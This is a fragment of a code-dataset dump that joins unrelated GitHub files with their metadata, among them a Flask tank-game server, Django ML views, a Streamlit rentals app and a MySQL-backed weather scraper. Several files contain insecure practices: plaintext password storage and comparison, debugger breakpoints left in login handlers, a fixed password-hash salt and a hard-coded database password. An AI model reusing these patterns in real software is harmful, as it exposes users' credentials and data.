u.password:\r\n flash(\"Username and password don't match.\", category=\"ERROR\")\r\n return render(\"signin.html\"), 200\r\n else:\r\n set_user(u)\r\n flash(\"Welcome back!\", category=\"SUCCESS\")\r\n return redirect(\"/\"), 303\r\n\r\n\r\n@app.route(\"/signup\", methods=[\"GET\"])\r\ndef serve_signup_page():\r\n return render(\"signup.html\"), 200\r\n\r\n\r\n@app.route(\"/signup\", methods=[\"POST\"])\r\ndef handle_signup_request():\r\n username = request.form[\"username\"]\r\n password = request.form[\"password\"]\r\n\r\n if password != request.form[\"rpassword\"]:\r\n flash(\"Passwords don't match.\", category=\"ERROR\")\r\n return render(\"signup.html\"), 200\r\n elif Users.query.filter_by(username=username).count() > 0:\r\n flash(\"Username is already taken.\", category=\"ERROR\")\r\n return render(\"signup.html\"), 200\r\n else:\r\n user = Users(\r\n username=username,\r\n password=argon2.argon2_hash(password, username + \"abcdefgh\"),\r\n )\r\n db.session.add(user)\r\n db.session.commit()\r\n set_user(user)\r\n flash(\"Welcome! Your account has been created.\", category=\"SUCCESS\")\r\n return redirect(\"/\"), 303\r\n\r\n\r\n@app.route(\"/signout\")\r\ndef handle_signout_request():\r\n set_user(None)\r\n flash(\"Goodbye!\", category=\"SUCCESS\")\r\n return redirect(\"/\"), 303\r\n\r\n\r\n@app.route(\"/userlist\")\r\ndef serve_userlist():\r\n return render(\r\n \"userlist.html\", users=Users.query.filter(Users.code != None).all()\r\n )\r\n\r\n\r\n@app.route(\"/challenge/\")\r\ndef challenge(id):\r\n if not user:\r\n flash(\"You must be signed in!\", category=\"ERROR\")\r\n return redirect(\"/signin\"), 303\r\n else:\r\n u = Users.query.filter_by(id=id).first()\r\n if u is None:\r\n flash(\"Opponent does not exist!\", category=\"ERROR\")\r\n return redirect(\"/userlist\"), 303\r\n elif user.id == id:\r\n flash(\"You cannot challenge yourself!\", category=\"ERROR\")\r\n return redirect(\"/userlist\"), 303\r\n elif not u.code.strip():\r\n flash(\r\n \"You cannot challenge someone who hasn't submitted code!\",\r\n category=\"ERROR\",\r\n )\r\n return redirect(\"/userlist\"), 303\r\n else:\r\n match = Match(blue_uid=user.id, red_uid=u.id)\r\n db.session.add(match)\r\n db.session.commit()\r\n\r\n entry.run(match.id)\r\n return render(\"challenge.html\", match=match.id, target=u), 200\r\n\r\n\r\n@app.route(\"/replay-viewer/\")\r\ndef replay_viewer(mid):\r\n match = Match.query.filter_by(id=mid).first_or_404()\r\n return (\r\n render(\r\n \"replay-viewer.html\",\r\n match=mid,\r\n frames=MatchFrame.query.filter_by(mid=mid).count(),\r\n ),\r\n 200,\r\n )\r\n\r\n\r\n@app.route(\"/match-data/\")\r\ndef match_data(mid):\r\n match = Match.query.filter_by(id=mid).first()\r\n red_tanks = MatchTanks.query.filter_by(mid=match.id, colour=\"RED\").all()\r\n blue_tanks = MatchTanks.query.filter_by(mid=match.id, colour=\"BLUE\").all()\r\n\r\n match_frames = (\r\n MatchFrame.query.filter_by(mid=mid)\r\n .order_by(MatchFrame.frame_no)\r\n .options(joinedload(\"tank_frames\"), joinedload(\"frame_updates\"))\r\n .all()\r\n )\r\n\r\n def format_frame_for_team(tanks, enemy, f):\r\n ret = []\r\n\r\n for t in tanks:\r\n tf = TankFrame.query.with_parent(f).filter_by(mtid=t.id).first()\r\n updates = (\r\n FrameUpdates.query.with_parent(f).filter_by(mtid=t.id).all()\r\n )\r\n\r\n angle = -1\r\n ability = -1\r\n\r\n for update in updates:\r\n if update.action == \"FIRE\":\r\n target = enemy[int(update.data)]\r\n target_frame = (\r\n TankFrame.query.with_parent(f)\r\n .filter_by(mtid=target.id)\r\n .first()\r\n )\r\n angle = math.atan2(\r\n target_frame.pos_y - tf.pos_y,\r\n target_frame.pos_x - tf.pos_x,\r\n )\r\n elif update.action == \"ABILITY\":\r\n if tf.tank.type in [\r\n \"artillery\",\r\n \"assassin\",\r\n \"shield\",\r\n \"kamikaze\",\r\n \"scout\",\r\n ]:\r\n ability = 0\r\n elif tf.tank.type == \"mortar\":\r\n ability = json.loads(update.data)\r\n elif tf.tank.type in [\"repair\", \"hack\"]:\r\n ability = int(update.data)\r\n\r\n ret.append(\r\n [\r\n tf.pos_x,\r\n tf.pos_y,\r\n tf.health,\r\n angle,\r\n tf.ability_cd,\r\n ability,\r\n [y for x, y in [(tf.shielded, \"shielded\")] if x],\r\n ]\r\n )\r\n\r\n return ret\r\n\r\n return json.dumps(\r\n [\r\n [],\r\n [match.red_user.username, match.blue_user.username],\r\n [\r\n [rt.type for rt in red_tanks],\r\n [bt.type for bt in blue_tanks],\r\n ],\r\n [\r\n [\r\n format_frame_for_team(red_tanks, blue_tanks, f),\r\n format_frame_for_team(blue_tanks, red_tanks, f),\r\n ]\r\n for f in match_frames\r\n ],\r\n ]\r\n )\r\n\r\n\r\n@app.route(\"/users\")\r\ndef handle_users():\r\n users = Users.query.filter(Users.code != None).all()\r\n print(users)\r\n return render(\"users.html\", users=users), 200\r\n\r\n\r\n@app.route(\"/battle\", methods=[\"POST\"])\r\ndef handle_battle():\r\n pass\r\n\r\n\r\n@app.errorhandler(404)\r\ndef not_found(e):\r\n return render(\"404.html\"), 404\r\n\r\n\r\n@app.errorhandler(500)\r\ndef internal_server_error(e):\r\n return render(\"500.html\"), 500\r\n", "repo_name": "Riolku/tank-game", "sub_path": "src/tank_game/server/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "database.db.session.commit", "line_number": 60, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 60, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "database.Users.query.filter_by", "line_number": 75, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 75, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 77, "usage_type": "call"}, {"api_name": "argon2.argon2_hash", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 96, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 96, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 99, "usage_type": "call"}, {"api_name": "database.Users.query.filter_by", "line_number": 101, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 101, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 102, "usage_type": "call"}, {"api_name": "database.Users", "line_number": 105, "usage_type": "call"}, {"api_name": "argon2.argon2_hash", "line_number": 107, "usage_type": "call"}, {"api_name": "database.db.session.add", "line_number": 109, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 109, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 109, "usage_type": "name"}, {"api_name": "database.db.session.commit", "line_number": 110, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 110, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 112, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 120, "usage_type": "call"}, {"api_name": "database.Users.query.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 126, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 126, "usage_type": "name"}, {"api_name": "database.Users.code", "line_number": 126, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 134, "usage_type": "call"}, {"api_name": "database.Users.query.filter_by", "line_number": 136, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 136, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 138, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 148, "usage_type": "call"}, {"api_name": "database.Match", "line_number": 150, "usage_type": "call"}, {"api_name": "database.db.session.add", "line_number": 151, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 151, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 151, "usage_type": "name"}, {"api_name": "database.db.session.commit", "line_number": 152, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 152, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 152, "usage_type": "name"}, {"api_name": "game_server.entry.run", "line_number": 154, "usage_type": "call"}, {"api_name": "game_server.entry", "line_number": 154, "usage_type": "name"}, {"api_name": "database.Match.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "database.Match.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "database.Match", "line_number": 160, "usage_type": "name"}, {"api_name": "database.MatchFrame.query.filter_by", "line_number": 165, "usage_type": "call"}, {"api_name": "database.MatchFrame.query", "line_number": 165, "usage_type": "attribute"}, {"api_name": "database.MatchFrame", "line_number": 165, "usage_type": "name"}, {"api_name": "database.Match.query.filter_by", "line_number": 173, "usage_type": "call"}, {"api_name": "database.Match.query", "line_number": 173, "usage_type": "attribute"}, {"api_name": "database.Match", "line_number": 173, "usage_type": "name"}, {"api_name": "database.MatchTanks.query.filter_by", "line_number": 174, "usage_type": "call"}, {"api_name": "database.MatchTanks.query", "line_number": 174, "usage_type": "attribute"}, {"api_name": "database.MatchTanks", "line_number": 174, "usage_type": "name"}, {"api_name": "database.MatchTanks.query.filter_by", "line_number": 175, "usage_type": "call"}, {"api_name": "database.MatchTanks.query", "line_number": 175, "usage_type": "attribute"}, {"api_name": "database.MatchTanks", "line_number": 175, "usage_type": "name"}, {"api_name": "database.MatchFrame.query.filter_by", "line_number": 178, "usage_type": "call"}, {"api_name": "database.MatchFrame.query", "line_number": 178, "usage_type": "attribute"}, {"api_name": "database.MatchFrame", "line_number": 178, "usage_type": "name"}, {"api_name": "database.MatchFrame.frame_no", "line_number": 179, "usage_type": "attribute"}, {"api_name": "database.MatchFrame", "line_number": 179, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.joinedload", "line_number": 180, "usage_type": "call"}, {"api_name": "database.TankFrame.query.with_parent", "line_number": 188, "usage_type": "call"}, {"api_name": "database.TankFrame.query", "line_number": 188, "usage_type": "attribute"}, {"api_name": "database.TankFrame", "line_number": 188, "usage_type": "name"}, {"api_name": "database.FrameUpdates.query.with_parent", "line_number": 190, "usage_type": "call"}, {"api_name": "database.FrameUpdates.query", "line_number": 190, "usage_type": "attribute"}, {"api_name": "database.FrameUpdates", "line_number": 190, "usage_type": "name"}, {"api_name": "database.TankFrame.query.with_parent", "line_number": 200, "usage_type": "call"}, {"api_name": "database.TankFrame.query", "line_number": 200, "usage_type": "attribute"}, {"api_name": "database.TankFrame", "line_number": 200, "usage_type": "name"}, {"api_name": "math.atan2", "line_number": 204, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 218, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 236, "usage_type": "call"}, {"api_name": "database.Users.query.filter", "line_number": 257, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 257, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 257, "usage_type": "name"}, {"api_name": "database.Users.code", "line_number": 257, "usage_type": "attribute"}]} +{"seq_id": "13261583294", "text": "from django.shortcuts import render, redirect\nfrom Openml.models import Member, Csv, Values \nfrom django.core.files.storage import FileSystemStorage \nimport pdb\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\n\ndef index(request):\n if request.method == 'POST':\n if Member.objects.filter(username=request.POST['username'], password=request.POST['password']).exists():\n context = {'sm':'username already exists give another one'}\n return render(request,'index.html',context)\n else: \n member = Member(username=request.POST['username'], password=request.POST['password'], firstname=request.POST['firstname'], lastname=request.POST['lastname'])\n member.save()\n return redirect('login/')\n else:\n return render(request, 'index.html')\n \ndef login(request):\n if request.method == 'GET':\n return render(request, 'login.html')\n elif request.method == 'POST':\n if Member.objects.filter(username=request.POST['username'], password=request.POST['password']).exists():\n #member = Member.objects.get(username=request.POST['username'], password=request.POST['password'])\n pdb.set_trace()\n return redirect('/upload/csv') \n else:\n context = {'msg': 'Invalid username or password'}\n return render(request, 'login.html', context) \n\ndef handle_uploaded_file(f):\n with open('/home/gups/workingdir/ML_using_Django/ML/Openml/uploaded_file/save.csv', 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk) \n \ndef upload_csv(request):\n if request.method=='POST':\n form = Csv(request.POST,request.FILES)\n f= request.FILES['filename'] \n handle_uploaded_file(f) \n reading_csv(f)\n context={'msg':'upload done'} \n return render(request, 'upload_csv.html',context)\n else:\n return render(request, 'upload_csv.html')\n\ndataset = None\ndef reading_csv(f):\n global dataset\n dataset = pd.read_csv('/home/gups/workingdir/ML_using_Django/ML/Openml/uploaded_file/save.csv')\n \n\n \ndef xy(request):\n if request.method == 'GET':\n x = request.GET.get('x')\n y = request.GET.get('y')\n x=int(x)\n y=int(y)\n create_matrix(x,y) \n context = {'x': x, 'y': y}\n return render(request,'upload_csv.html', context)\n\n\ndef create_matrix(x,y):\n global dataset,X,Y,bx\n if x == 1:\n x=1\n else:\n x=x-1\n\n y=y-1\n bx=x\n X=dataset.iloc[:,:x].values\n pdb.set_trace()\n Y=dataset.iloc[:,y:].values\n\ndef missing_values(request):\n global X\n imputer = SimpleImputer(missing_values=np.nan, strategy='mean')\n imputer.fit(X[:,:])\n X[:,:] = imputer.transform(X[:,:])\n context = {'mv' : 'Done'}\n return render(request,'upload_csv.html',context)\n\n \ndef train_test(request):\n global X,Y,X_train, X_test, y_train, y_test\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 1/3, random_state = 0)\n context = {'tt':'Train and test data got Created'}\n return render(request,'upload_csv.html',context)\n\ndef slr(request):\n global X_train,y_train,regressor\n from sklearn.linear_model import LinearRegression\n regressor = LinearRegression()\n regressor.fit(X_train, y_train)\n context = {'slr':'Model prepared for test'}\n return render(request,'train_model.html',context)\n\ndef prediction(request):\n global X_test,y_pred,regressor\n y_pred = regressor.predict(X_test) \n context = {'y_pred': y_pred}\n return render(request,'train_model.html',context) \n\ndef visual_traindata(request):\n global X_train,y_train,regressor\n plt.scatter(X_train, y_train, color = 'red')\n plt.plot(X_train, regressor.predict(X_train), color = 'blue')\n plt.title('Salary vs Experience (Training set)')\n plt.xlabel('Years of Experience')\n plt.ylabel('Salary')\n plt.savefig('Train.png', dpi=200)\n image_data = open(\"/home/gups/workingdir/ML_using_Django/ML/Train.png\", \"rb\").read()\n return HttpResponse(image_data, content_type=\"image/png\")\n\ndef visual_testdata(request):\n global X_train,y_train,regressor,X_test, y_test\n plt.scatter(X_test, y_test, color = 'red')\n plt.plot(X_train, regressor.predict(X_train), color = 'blue')\n plt.title('Salary vs Experience (Test set)')\n plt.xlabel('Years of Experience')\n plt.ylabel('Salary')\n plt.savefig('Test.png', dpi=220)\n image_data = open(\"/home/gups/workingdir/ML_using_Django/ML/Test.png\", \"rb\").read()\n return HttpResponse(image_data, content_type=\"image/png\")\n\ndef train_model(request):\n return render(request,'train_model.html')\n\ndef categorical_data(request):\n global X,dataset,colname,x1,xn\n if request.method == 'GET':\n a = request.GET.get('a')\n qn = int(a)\n qn = qn-2\n colname = dataset.columns[qn]\n x1=dataset[colname]\n xn=x1.nunique()\n ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [qn])], remainder='passthrough')\n pdb.set_trace()\n X = np.array(ct.fit_transform(X))\n pdb.set_trace()\n context = {'a': a}\n return render(request,'upload_csv.html', context)\n\ndef Feature_Scaling(request):\n global X_train,X_test,xn\n if request.method == 'GET':\n m = request.GET.get('m')\n n = request.GET.get('n')\n m=int(m)\n n1=int(n)\n m=(m+xn)-3\n n1=(n1+xn-2)+1\n pdb.set_trace()\n sc = StandardScaler()\n X_train[:,m:n1] = sc.fit_transform(X_train[:,m:n1])\n pdb.set_trace()\n X_test[:,m:n1] = sc.transform(X_test[:,m:n1]) \n context={'msg' : 'Done'}\n return render(request,'train_model.html')\n", "repo_name": "guneshprasads/ML_using_Django", "sub_path": "ML/Openml/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Openml.models.Member.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "Openml.models.Member.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "Openml.models.Member", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "Openml.models.Member", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "Openml.models.Member.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "Openml.models.Member.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Openml.models.Member", "line_number": 32, "usage_type": "name"}, {"api_name": "pdb.set_trace", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "Openml.models.Csv", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 71, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 89, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 99, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 106, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 109, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 151, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 156, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 168, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 170, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "36214524650", "text": "list_1 = [1, 2, 3, 4, 5, 5, 4, 2, 6, 7]\n\nlist_2 = [5, 6, 7, 8]\n\nprint(type(list_1))\n\nset_1 = set(list_1)\n\nprint(set_1, list_1)\n\nprint(list_1.extend(list_2))\nname = \"sdcsdcsdcsd\"\n\nfrom collections import deque\n\nlist_3 = deque(list_2)\nprint(type(list_3))\nlist_3.append(56)\nlist_3.popleft()\n\nsquares = []\n\nfor x in range(2, 10):\n squares.append(x ** 2)\nprint(squares)\n\nsquares = list(x ** 2 for x in range(10))\n\nprint(squares)\n\nsquares = list((x, y) for x in [1, 2, 3] for y in [4, 5, 6])\n\nn = ['hhcsd', \"csdcsdc\", \"dcsdcdsc\"], [1, 2, 5]\nprint(n)\n\nquestions = ['name', 'quest', 'favorite color']\nanswers = ['lancelot', 'the holy grail', 'blue']\nfor q, a in zip(questions, answers):\n print('What is your {0}? It is {1}.'.format(q, a))\n\nfor x in range(2, 52, 5):\n print(x)\n\n\na = list(range(10))\n\nprint(a)\n\nsquares = list(map(lambda x: x ** 2, range(10)))\nprint(squares)\n\n\n\n", "repo_name": "13671148038/pyghonbase", "sub_path": "zhixingshidai/day2/list.py", "file_name": "list.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "26332667203", "text": "import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\n\nst.set_page_config(layout=\"wide\")\n\nst.title('Sample of Vancouver rentals')\n\ndf1 = pd.read_csv('dataset.csv')\nfeat = ['price','livingArea','bedrooms','bathrooms','url','address/zipcode','address/streetAddress','latitude','longitude']\ndf1 = df1[feat]\n#df1 = df1[df1['price']<8000]\n#df1 = df1[df1['livingArea']<4000]\n\n#st.write(df1)\n\n#maxbedrooms = st.slider('hour', 0, 6, 3) # min: 0, max: 3, default: 3\n\n\ncol1, col2 = st.columns([2,2])\n\nmaxprice = col1.slider('Max price:', 1500, 12000, 8000) # min: 1500, max: 12000, default: 8000\nmaxarea = col1.slider('Max living area:', 300, 5000, 2000)\n\ndf = df1[df1['price'] <= maxprice]\ndf = df[df['livingArea'] <= maxarea]\ndf[\"bedrooms\"] = df[\"bedrooms\"].astype(str)\nfig = px.scatter(df, x=\"livingArea\", y=\"price\",color=\"bedrooms\", trendline=\"ols\",color_discrete_sequence=px.colors.qualitative.Antique,trendline_scope=\"overall\")\n\n#fig = px.scatter(df1, x=\"livingArea\", y=\"price\",color=\"bedrooms\", trendline=\"ols\",color_discrete_sequence=px.colors.qualitative.Antique,trendline_scope=\"overall\")\ncol1.plotly_chart(fig,theme=None)\n\n\nif col2.checkbox('Show map'):\n #st.subheader('Map of Vancouver rentals')\n col2.map(df)\n\n", "repo_name": "GCristianD/Vancouver", "sub_path": "VancouverStreamLit.py", "file_name": "VancouverStreamLit.py", "file_ext": "py", "file_size_in_byte": 1255, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.set_page_config", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 21, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 29, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 29, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "33546437454", "text": "import requests\nimport xml.etree.ElementTree as ET\n\nfrom lxml import html\n\nimport pymysql\nfrom pymysql.cursors import DictCursor\n\nconnection = pymysql.connect(\n host='localhost',\n user='kommunar',\n password='123',\n db='price',\n charset='utf8mb4',\n cursorclass=DictCursor\n)\n\nparams = {'id':'ru', 'region':38}\nr = requests.get('http://www.pogodaiklimat.ru/archive.php', params=params)\nr.encoding = r.apparent_encoding\n\ntree = html.fromstring(r.text)\n\nlist = tree.xpath('//ul[@class = \"big-blue-billet__list\"]')[0].findall(\"li\")\nfor row in list:\n li = row.getchildren()[0]\n query = \"INSERT INTO price.city_id_weather(id, region, city) \" \\\n \"VALUES(%s,%s,%s)\"\n args = (li.attrib['href'], 'Иркутская область', li.text_content())\n cursor = connection.cursor()\n cursor.execute(query, args)\n connection.commit()\n\n", "repo_name": "Kommunarus/RosStat", "sub_path": "parsing/city.py", "file_name": "city.py", "file_ext": "py", "file_size_in_byte": 868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymysql.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "pymysql.cursors.DictCursor", "line_number": 15, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 22, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "12341431066", "text": "from setuptools import setup, find_packages\n\n\nrequires = [\n \"pyramid\",\n \"setuptools>=0.7\",\n \"deform>=2.0dev\",\n \"pyramid-deform\",\n \"pyramid-layout\",\n \"sqlalchemy\",\n \"zope.sqlalchemy\",\n \"rebecca.repository\",\n \"pyramid_mako\",\n \"webhelpers2>=2.0b5\",\n]\n\ntests_require = [\n \"testfixtures\",\n \"webtest\",\n]\n\nsetup(name=\"rebecca.app.admin\",\n namespace_packages=['rebecca', 'rebecca.app'],\n install_requires=requires,\n packages=find_packages(),\n tests_require=tests_require,\n extras_require={\n \"testing\": requires+tests_require,\n },\n)\n", "repo_name": "rebeccaframework/rebecca.app.admin", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "39829607706", "text": "\"\"\" This module implements the face blurring feature for the given human face in the given images\n\"\"\"\nfrom facexlib.parsing import init_parsing_model\nfrom facexlib.utils.misc import img2tensor\nfrom torchvision.transforms.functional import normalize\nfrom typing import Any\nfrom typing import Tuple\nfrom typing import List\nfrom typing import Union\n\nimport 